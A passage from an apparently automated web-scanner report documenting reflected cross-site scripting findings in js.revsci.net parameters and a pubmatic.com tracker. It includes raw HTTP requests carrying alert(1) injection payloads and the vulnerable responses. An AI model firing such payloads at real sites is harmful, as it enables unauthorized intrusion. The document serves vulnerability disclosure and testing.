ginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=6&pubId=398&ran=0.1927952092951985633c57'-alert(1)-'f87ac0b58b4&pageURL=http://www.pubmatic.com/">
...[SNIP]...

2.100. http://js.revsci.net/gateway/gw.js [bpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f3ae'%3balert(1)//c43dde16a24 was submitted in the bpid parameter. This input was echoed as 8f3ae';alert(1)//c43dde16a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S02778f3ae'%3balert(1)//c43dde16a24 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39zMJZjpn557JwHIRqQjg4NJ56yd8VNTcwHvXKY2j86DzzC9h18LIqIAEiQUbBEgS1qnrAGsS3AmIZhAkRm4O8HmsRRFBNnYYhKP0pvn6ci0/k/XJXf/YR0wR28cb58KaGgKcALzZ/gGKvpgsn3TZxqUsLEJP4LjKxRM1VpjCA6BEtxzHR9Jy5ikb8xmSYamenQ7DU4G+9u1H/00RLBaxuPbIxWIkAjjjRFJ5Ae37nycffgEH0zpACrrbhe8O3b4YkbV5V2fwQGDzIOsjI+L46IREGYP3xgjWcglkIJBtCmKEWOHP5SDuCatHEuXXjaz/UTSd2+oWVj9yBNSkAJ2Lf1pf1EXshUyadIy4TdOiiVS8U0QxyqtWCTjZgAU0VBUVBO4YFImrJQIwCA4E82PQhdgcKRyJmSbWRotQQcccJBfe0W7s96N7QeZjMjX9yZWzWj+MOI0Iqvvy4O8UI2HT3olT4VwVrJ54E8ZoeoXCVlVFQG6MqWb2OCHtTc6LjowpgC5dluOOaUO0tDsT7qpf6MB1CKUuvIQAnPJgfcO+i7EV8k7/WIWI9j3lnFQJOylU+DdtKlE8845hox3ENZvGE1o8aF+UnIHBhOBGu3/J5rSMJ5HHqve2KC6PM6LBls+o3BlUio0gdasO+J59I7X5NIm9xgJYQilisK+sVy+BWLthHSYahPGbswvTtZccT9+SsWMSQxsAmZBz0h2xzmutsskqfFyuAqm6mZWTnFLemB1Gx26fRgvVWMJVFpcH+rHPXYBQxAu3aXZYOjsuwjgJoQgCWsrnvMAz9g2T0ibbncF++W0v7u2YF7UOykhmYoOEvHbl1+mduzj0lnKoZlw6xxQJOzjxFfZxHtQuhPdEytbTeVNYhm4yTlurtj1LKw7frMGodRkF8/FSbsrMwla5uepMkIQfAnZv+gmGF/5aVgBBKHkKW4dvhpIV557IqotUalE8EYKhDPd0cZjhQaA2Dz4/7GirtoHS2sU5+Amq9nK/PMHYC3Nz7b4DiWvZXqWMWsDpLlsJBktr95mLhYhNk0ET9DbfpJH4Qz3/rLPSsRdsH3ruWS5Bjnhu6U8ScR0MzqiPzpk7FrHyZs5c3VActGSe0bIYd/hnIis2trp19pPgqMI3O+vGADtiubcr8aRQVox9Din0pRpQjgG3MwNjHniJzpRcpcJ+rupF1X7Zs5Fz/RogaxO2jHM++gTiBokSpXL8HuY4ZXL54e47wyqomaYykNgzLww47G0JJ27dok7EDLp9lVnOZoTzjtKxyOP3G1YheVTT9YD7vaaBDJzqueDjtHIf4oGlqdDvAhYY7EH2zDdxZUTzU484IvvGHGD7e6FXt2/Mp0ui0tFBTiwHqQTUc6MCtYmomot//wtCxY3BiNevsigm4KEOrkw5iTZAVdnP9ViqNEzWsp2WrSyHP2ktAjYoFtNuNAViRWbMAt+1rNGRznBBSDf6tWWa+aA6jWc+2yZ+TEQ1fTapHSmDd9fnfnGt0127oJy9+XChqVSKAdQyuRsSjN7uHd41zykqQH/VclcOclM/qv8I0RZ/398meN11UyV76PwiY1s8fclDDFhbfLMexxbQTn58QHt/MtvMFZkqk5wYc1kwYzs=; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:30 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:33:29 GMT
Content-Length: 6560

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S02778f3ae';alert(1)//c43dde16a24');else DM_addEncToLoc("bpid",'S02778f3ae';alert(1)//c43dde16a24');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...

2.101. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ad57a<script>alert(1)</script>db723b0c3cf was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K05540ad57a<script>alert(1)</script>db723b0c3cf HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR